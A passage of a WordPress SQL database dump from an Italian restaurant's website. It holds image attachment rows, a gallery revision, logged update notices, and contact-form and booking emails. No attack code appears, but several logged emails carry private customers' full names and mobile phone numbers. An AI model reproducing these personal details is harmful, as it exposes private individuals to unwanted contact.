12:25:33','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0126.jpg',0,'attachment','image/jpeg',0),(1178,2,'2020-10-29 13:25:50','2020-10-29 12:25:50','','solymar giugno2020 - 0101 (1)','','inherit','open','closed','','solymar-giugno2020-0101-1','','','2020-10-29 13:25:50','2020-10-29 12:25:50','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0101-1.jpg',0,'attachment','image/jpeg',0),(1179,2,'2020-10-29 13:25:59','2020-10-29 12:25:59','','solymar giugno2020 - 0100 (1)','','inherit','open','closed','','solymar-giugno2020-0100-1','','','2020-10-29 13:25:59','2020-10-29 12:25:59','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0100-1.jpg',0,'attachment','image/jpeg',0),(1180,2,'2020-10-29 13:26:16','2020-10-29 12:26:16','','solymar giugno2020 - 0095 (1)','','inherit','open','closed','','solymar-giugno2020-0095-1','','','2020-10-29 13:26:16','2020-10-29 12:26:16','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0095-1.jpg',0,'attachment','image/jpeg',0),(1181,2,'2020-10-29 13:26:28','2020-10-29 12:26:28','','solymar giugno2020 - 0093 (1)','','inherit','open','closed','','solymar-giugno2020-0093-1','','','2020-10-29 13:26:28','2020-10-29 12:26:28','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0093-1.jpg',0,'attachment','image/jpeg',0),(1182,2,'2020-10-29 13:28:31','2020-10-29 12:28:31','','solymar giugno2020 - 0122','','inherit','open','closed','','solymar-giugno2020-0122','','','2020-10-29 13:28:31','2020-10-29 12:28:31','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0122.jpg',0,'attachment','image/jpeg',0),(1183,2,'2020-10-29 13:29:32','2020-10-29 12:29:32','','solymar giugno2020 - 0024','','inherit','open','closed','','solymar-giugno2020-0024','','','2020-10-29 13:29:32','2020-10-29 12:29:32','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0024.jpg',0,'attachment','image/jpeg',0),(1184,2,'2020-10-29 13:29:43','2020-10-29 12:29:43','','solymar giugno2020 - 0025','','inherit','open','closed','','solymar-giugno2020-0025','','','2020-10-29 13:29:43','2020-10-29 12:29:43','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0025.jpg',0,'attachment','image/jpeg',0),(1185,2,'2020-10-29 13:30:09','2020-10-29 12:30:09','','solymar giugno2020 - 0027 (1)','','inherit','open','closed','','solymar-giugno2020-0027-1','','','2020-10-29 13:30:09','2020-10-29 12:30:09','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0027-1.jpg',0,'attachment','image/jpeg',0),(1186,2,'2020-10-29 13:30:20','2020-10-29 12:30:20','','solymar giugno2020 - 0028 (1)','','inherit','open','closed','','solymar-giugno2020-0028-1','','','2020-10-29 13:30:20','2020-10-29 12:30:20','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0028-1.jpg',0,'attachment','image/jpeg',0),(1187,2,'2020-10-29 13:30:51','2020-10-29 12:30:51','','solymar giugno2020 - 0026','','inherit','open','closed','','solymar-giugno2020-0026','','','2020-10-29 13:30:51','2020-10-29 12:30:51','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0026.jpg',0,'attachment','image/jpeg',0),(1188,2,'2020-10-29 13:37:09','2020-10-29 12:37:09','','solymar giugno2020 - 0183 (1)','','inherit','open','closed','','solymar-giugno2020-0183-1','','','2020-10-29 13:37:09','2020-10-29 12:37:09','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0183-1.jpg',0,'attachment','image/jpeg',0),(1189,2,'2020-10-29 13:37:20','2020-10-29 12:37:20','','solymar giugno2020 - 0033 (1)','','inherit','open','closed','','solymar-giugno2020-0033-1','','','2020-10-29 13:37:20','2020-10-29 12:37:20','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0033-1.jpg',0,'attachment','image/jpeg',0),(1190,2,'2020-10-29 13:37:37','2020-10-29 12:37:37','','solymar giugno2020 - 0035 (1)','','inherit','open','closed','','solymar-giugno2020-0035-1','','','2020-10-29 13:37:37','2020-10-29 12:37:37','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0035-1.jpg',0,'attachment','image/jpeg',0),(1191,2,'2020-10-29 13:37:53','2020-10-29 12:37:53','','solymar giugno2020 - 0040','','inherit','open','closed','','solymar-giugno2020-0040','','','2020-10-29 13:37:53','2020-10-29 12:37:53','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0040.jpg',0,'attachment','image/jpeg',0),(1192,2,'2020-10-29 13:38:13','2020-10-29 12:38:13','','solymar giugno2020 - 0041 (1)','','inherit','open','closed','','solymar-giugno2020-0041-1','','','2020-10-29 13:38:13','2020-10-29 12:38:13','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0041-1.jpg',0,'attachment','image/jpeg',0),(1193,2,'2020-10-29 13:38:26','2020-10-29 12:38:26','','solymar giugno2020 - 0042','','inherit','open','closed','','solymar-giugno2020-0042','','','2020-10-29 13:38:26','2020-10-29 12:38:26','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0042.jpg',0,'attachment','image/jpeg',0),(1194,2,'2020-10-29 13:38:39','2020-10-29 12:38:39','','solymar giugno2020 - 0044 (1)','','inherit','open','closed','','solymar-giugno2020-0044-1','','','2020-10-29 13:38:39','2020-10-29 12:38:39','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0044-1.jpg',0,'attachment','image/jpeg',0),(1195,2,'2020-10-29 13:38:48','2020-10-29 12:38:48','','solymar giugno2020 - 0045 (1)','','inherit','open','closed','','solymar-giugno2020-0045-1','','','2020-10-29 13:38:48','2020-10-29 12:38:48','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0045-1.jpg',0,'attachment','image/jpeg',0),(1196,2,'2020-10-29 13:39:05','2020-10-29 12:39:05','','solymar giugno2020 - 0046','','inherit','open','closed','','solymar-giugno2020-0046','','','2020-10-29 13:39:05','2020-10-29 12:39:05','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0046.jpg',0,'attachment','image/jpeg',0),(1197,2,'2020-10-29 13:39:17','2020-10-29 12:39:17','','solymar giugno2020 - 0050 (1)','','inherit','open','closed','','solymar-giugno2020-0050-1','','','2020-10-29 13:39:17','2020-10-29 12:39:17','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0050-1.jpg',0,'attachment','image/jpeg',0),(1198,2,'2020-10-29 13:39:29','2020-10-29 12:39:29','','solymar giugno2020 - 0052','','inherit','open','closed','','solymar-giugno2020-0052','','','2020-10-29 13:39:29','2020-10-29 12:39:29','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0052.jpg',0,'attachment','image/jpeg',0),(1199,2,'2020-10-29 13:39:54','2020-10-29 12:39:54','','solymar giugno2020 - 0055','','inherit','open','closed','','solymar-giugno2020-0055','','','2020-10-29 13:39:54','2020-10-29 12:39:54','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0055.jpg',0,'attachment','image/jpeg',0),(1200,2,'2020-10-29 13:40:07','2020-10-29 12:40:07','','solymar giugno2020 - 0066','','inherit','open','closed','','solymar-giugno2020-0066','','','2020-10-29 13:40:07','2020-10-29 12:40:07','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0066.jpg',0,'attachment','image/jpeg',0),(1201,2,'2020-10-29 13:40:21','2020-10-29 12:40:21','','solymar giugno2020 - 0181','','inherit','open','closed','','solymar-giugno2020-0181','','','2020-10-29 13:40:21','2020-10-29 12:40:21','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0181.jpg',0,'attachment','image/jpeg',0),(1202,2,'2020-10-29 13:40:33','2020-10-29 12:40:33','','solymar giugno2020 - 0182','','inherit','open','closed','','solymar-giugno2020-0182','','','2020-10-29 13:40:33','2020-10-29 12:40:33','',141,'https://www.ristorantesolymar.it/wp-content/uploads/2020/10/solymar-giugno2020-0182.jpg',0,'attachment','image/jpeg',0),(1203,2,'2020-10-29 13:40:51','2020-10-29 12:40:51','<h2>La location</h2>\r\n[gallery size=\"medium\" link=\"file\" columns=\"2\" ids=\"67,135,137,138,1183,1184,1185,1186,1187,1188,1189,1190,1191,1192,1193,1194,1195,1196,1197,1198,1199,1200,1201,1202\"]\r\n<h2>I piatti</h2>\r\n[gallery link=\"file\" ids=\"146,143,145,144,142,136,147,134,1181,1180,1179,1178,1177,1174,1176,1182\"]','Gallery','','inherit','closed','closed','','141-revision-v1','','','2020-10-29 13:40:51','2020-10-29 12:40:51','',141,'https://www.ristorantesolymar.it/2020/10/29/141-revision-v1/',0,'revision','',0),(1204,0,'2020-10-30 01:35:16','2020-10-30 00:35:16','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.2.\n\nNo further action is needed on your part. For more on version 5.5.2, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.2','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-2','','','2020-10-30 01:35:16','2020-10-30 00:35:16','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-2/',0,'postman_sent_mail','',0),(1205,0,'2020-10-30 01:35:16','2020-10-30 00:35:16','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.2.\n\nNo further action is needed on your part. For more on version 5.5.2, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.2','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-2-2','','','2020-10-30 01:35:16','2020-10-30 00:35:16','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-2-2/',0,'postman_sent_mail','',0),(1206,0,'2020-10-31 01:23:49','2020-10-31 00:23:49','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.3.\n\nNo further action is needed on your part. For more on version 5.5.3, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-3','','','2020-10-31 01:23:49','2020-10-31 00:23:49','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-3/',0,'postman_sent_mail','',0),(1207,0,'2020-10-31 01:23:49','2020-10-31 00:23:49','Howdy! Your site at https://www.ristorantesolymar.it has been updated automatically to WordPress 5.5.3.\n\nNo further action is needed on your part. For more on version 5.5.3, see the About WordPress screen:\nhttps://www.ristorantesolymar.it/wp-admin/about.php\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team\n','[Sol Y Mar, ristorante a Riccione] Your site has updated to WordPress 5.5.3','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-3-2','','','2020-10-31 01:23:49','2020-10-31 00:23:49','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-your-site-has-updated-to-wordpress-5-5-3-2/',0,'postman_sent_mail','',0),(1208,0,'2020-11-02 13:22:52','2020-11-02 12:22:52','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.0.9\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-3','','','2020-11-02 13:22:52','2020-11-02 12:22:52','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-3/',0,'postman_sent_mail','',0),(1209,0,'2020-11-02 13:22:52','2020-11-02 12:22:52','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Newsletter, SMTP, Email marketing and Subscribe forms by Sendinblue version 3.0.9\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-4','','','2020-11-02 13:22:52','2020-11-02 12:22:52','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-4/',0,'postman_sent_mail','',0),(1210,0,'2020-11-03 01:23:23','2020-11-03 00:23:23','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-5','','','2020-11-03 01:23:23','2020-11-03 00:23:23','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-5/',0,'postman_sent_mail','',0),(1211,0,'2020-11-03 01:23:23','2020-11-03 00:23:23','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Yoast SEO version 15.2.1\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-6','','','2020-11-03 01:23:23','2020-11-03 00:23:23','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-6/',0,'postman_sent_mail','',0),(1212,0,'2020-11-03 16:08:44','2020-11-03 15:08:44','Da: Massimo Montalbani \nTelefono: 3290782176\nOggetto: Richiesta conferma apertura\n\nCorpo del messaggio:\nBuonasera, volevo sapere se domani a pranzo siete aperti. Sarò a Rimini con mia moglie e forse riusciamo a passare per il pranzo... Grazie!\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta conferma apertura\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-richiesta-conferma-apertura','','','2020-11-03 16:08:44','2020-11-03 15:08:44','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-conferma-apertura/',0,'postman_sent_mail','',0),(1213,0,'2020-11-03 16:08:45','2020-11-03 15:08:45','Da: Massimo Montalbani \nTelefono: 3290782176\nOggetto: Richiesta conferma apertura\n\nCorpo del messaggio:\nBuonasera, volevo sapere se domani a pranzo siete aperti. Sarò a Rimini con mia moglie e forse riusciamo a passare per il pranzo... Grazie!\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta conferma apertura\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-richiesta-conferma-apertura-2','','','2020-11-03 16:08:45','2020-11-03 15:08:45','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-conferma-apertura-2/',0,'postman_sent_mail','',0),(1214,0,'2020-11-03 18:34:13','2020-11-03 17:34:13','Da: Monia Corsi \nTelefono: 3472765800\nOggetto: Richiesta disponibilità\n\nCorpo del messaggio:\nBuonasera. \r\nVorrei sapere se avete la disponibilità x sabato 07/11/2020 a pranzo x due persone\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta disponibilità\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-richiesta-disponibilita','','','2020-11-03 18:34:13','2020-11-03 17:34:13','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-disponibilita/',0,'postman_sent_mail','',0),(1215,0,'2020-11-03 18:34:13','2020-11-03 17:34:13','Da: Monia Corsi \nTelefono: 3472765800\nOggetto: Richiesta disponibilità\n\nCorpo del messaggio:\nBuonasera. \r\nVorrei sapere se avete la disponibilità x sabato 07/11/2020 a pranzo x due persone\r\nGrazie\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Richiesta disponibilità\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-richiesta-disponibilita-2','','','2020-11-03 18:34:13','2020-11-03 17:34:13','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-richiesta-disponibilita-2/',0,'postman_sent_mail','',0),(1216,0,'2020-11-04 01:22:51','2020-11-04 00:22:51','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Fastest Cache version 0.9.1.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-7','','','2020-11-04 01:22:51','2020-11-04 00:22:51','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-7/',0,'postman_sent_mail','',0),(1217,0,'2020-11-04 01:22:51','2020-11-04 00:22:51','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- WP Fastest Cache version 0.9.1.2\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-8','','','2020-11-04 01:22:51','2020-11-04 00:22:51','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-8/',0,'postman_sent_mail','',0),(1218,0,'2020-11-05 01:23:28','2020-11-05 00:23:28','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Incorrect authentication data\r\n','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-9','','','2020-11-05 01:23:28','2020-11-05 00:23:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-9/',0,'postman_sent_mail','',0),(1219,0,'2020-11-05 01:23:28','2020-11-05 00:23:28','Howdy! Some plugins have automatically updated to their latest versions on your site at https://www.ristorantesolymar.it. No further action is needed on your part.\n\n\nThese plugins are now up to date:\n- Popup Builder version 3.69.5\n\n\nIf you experience any issues or need support, the volunteers in the WordPress.org support forums may be able to help.\nhttps://wordpress.org/support/forums/\n\nThe WordPress Team','[Sol Y Mar, ristorante a Riccione] Some plugins were automatically updated','Sent ( ** Fallback ** )','private','closed','closed','','sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-10','','','2020-11-05 01:23:28','2020-11-05 00:23:28','',0,'https://www.ristorantesolymar.it/postman_sent_mail/sol-y-mar-ristorante-a-riccione-some-plugins-were-automatically-updated-10/',0,'postman_sent_mail','',0),(1220,0,'2020-11-05 11:08:43','2020-11-05 10:08:43','Da: LUCA VERUCCHI \nTelefono: 3498222643\nOggetto: Prenotazione Domenica 8 Novembre 2020\n\nCorpo del messaggio:\nBuongiorno! Volevo, se possibile, prenotare un tavolo per 2 (due) persone alle ore 12:30, per domenica 8 novembre. \r\nSe possibile nei tavoli esterni, quelli più vicino alla spiaggia. Grazie, attendo vostre notizie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione Domenica 8 Novembre 2020\"','Incorrect authentication data\r\n','private','closed','closed','','da-sito-sol-y-mar-prenotazione-domenica-8-novembre-2020','','','2020-11-05 11:08:43','2020-11-05 10:08:43','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-domenica-8-novembre-2020/',0,'postman_sent_mail','',0),(1221,0,'2020-11-05 11:08:43','2020-11-05 10:08:43','Da: LUCA VERUCCHI \nTelefono: 3498222643\nOggetto: Prenotazione Domenica 8 Novembre 2020\n\nCorpo del messaggio:\nBuongiorno! Volevo, se possibile, prenotare un tavolo per 2 (due) persone alle ore 12:30, per domenica 8 novembre. \r\nSe possibile nei tavoli esterni, quelli più vicino alla spiaggia. Grazie, attendo vostre notizie.\n\nAccettato\n\n--\nQuesta e-mail è stata inviata da un modulo di contatto su Sol Y Mar (https://www.ristorantesolymar.it)','Da sito Sol Y Mar: \"Prenotazione Domenica 8 Novembre 2020\"','Sent ( ** Fallback ** )','private','closed','closed','','da-sito-sol-y-mar-prenotazione-domenica-8-novembre-2020-2','','','2020-11-05 11:08:43','2020-11-05 10:08:43','',0,'https://www.ristorantesolymar.it/postman_sent_mail/da-sito-sol-y-mar-prenotazione-domenica-8-novembre-2020-2/',0,'postman_sent_mail','',0),(1222,1,'2020-11-05 20:02:45','2020-11-05 19:02:45','','Order &ndash; November 5, 2020 @ 08:02 PM','Prenotazione per 6/11 pranzo ore 13 circa','wc-processing','open','closed','wc_order_MzJaFYytSBZH2','order-nov-05-2020-0702-pm','','','2020-11-05 20:04:17','2020-11-05 19:04:17','',0,'https://www.ristorantesolymar.it/?post_type=shop_order&#038;p=1222',0,'shop_order','',2),(1223,0,'2020-11-05 20:04:19','2020-11-05 19:04:19','\n\n	\n		\n		<title>Sol Y Mar, ristorante a Riccione</title>\n	\n	\n		<div id=\"wrapper\" dir=\"ltr\" style=\"background-color: #f5f5f5;margin: 0;padding: 70px 0;width: 100%\">\n			<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\">\n				<tr>\n					<td align=\"center\" valign=\"top\">\n						<div id=\"template_header_image\">\n													</div>\n						<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_container\" style=\"background-color: #fdfdfd;border: 1px solid #dcdcdc;border-radius: 3px\">\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Header -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"100%\" id=\"template_header\" style=\'background-color: #557da1;color: #ffffff;border-bottom: 0;font-weight: bold;line-height: 100%;vertical-align: middle;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;border-radius: 3px 3px 0 0\'>\n										<tr>\n											<td id=\"header_wrapper\" style=\"padding: 36px 48px\">\n												<h1 style=\'font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 30px;font-weight: 300;line-height: 150%;margin: 0;text-align: left;color: #ffffff;background-color: inherit\'>Nuova prenotazione cliente</h1>\n											</td>\n										</tr>\n									</table>\n									<!-- End Header -->\n								</td>\n							</tr>\n							<tr>\n								<td align=\"center\" valign=\"top\">\n									<!-- Body -->\n									<table border=\"0\" cellpadding=\"0\" cellspacing=\"0\" width=\"600\" id=\"template_body\">\n										<tr>\n											<td valign=\"top\" id=\"body_content\" style=\"background-color: #fdfdfd\">\n												<!-- Content -->\n												<table border=\"0\" cellpadding=\"20\" cellspacing=\"0\" width=\"100%\">\n													<tr>\n														<td valign=\"top\" style=\"padding: 48px 48px 32px\">\n															<div id=\"body_content_inner\" style=\'color: #737373;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 14px;line-height: 150%;text-align: left\'>\n\n<p style=\"margin: 0 0 16px\">You’ve received the following order from Raffaele Biondi:</p>\n\n<h2 style=\'color: #557da1;font-family: \"Helvetica Neue\", Helvetica, Roboto, Arial, sans-serif;font-size: 18px;font-weight: bold;line-height: 130%;margin: 0 0 18px;text-align: left\'>\n	<a class=\"link\" href=\"https://www.ristorantesolymar.it/wp-admin/post.php?post=1222&amp;action=edit\" style=\"font-weight: normal;text-decoration: underline;color: #557da1\">[Order #1222]</a> (5 November 2020)</h2>\n\n<div style=\"margin-bottom: 40px\">\n	<table class=\"td\" cellspacing=\"0\" cellpadding=\"6\" border=\"1\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;width: 100%;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		<thead>\n			<tr>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Product</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Quantity</th>\n				<th class=\"td\" scope=\"col\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Price</th>\n			</tr>\n		</thead>\n		<tbody>\n				<tr class=\"order_item\">\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n		Caparra - 2 (#caparrax2)		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			1		</td>\n		<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;padding: 12px;text-align: left;vertical-align: middle;font-family: \'Helvetica Neue\', Helvetica, Roboto, Arial, sans-serif\">\n			<span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span>		</td>\n	</tr>\n	\n		</tbody>\n		<tfoot>\n								<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\">Subtotal:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left;border-top-width: 4px\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Payment method:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">PayPal</td>\n					</tr>\n										<tr>\n						<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\">Total:</th>\n						<td class=\"td\" style=\"color: #737373;border: 1px solid #e4e4e4;vertical-align: middle;padding: 12px;text-align: left\"><span class=\"woocommerce-Price-amount amount\">30,00<span class=\"woocommerce-Price-currencySymbol\">€</span></span></td>\n					</tr>\n									<tr>\n					<th class=\"td\" scope=\"row\" colspan=\"2\" style=\"color: #737373;border: 1px solid 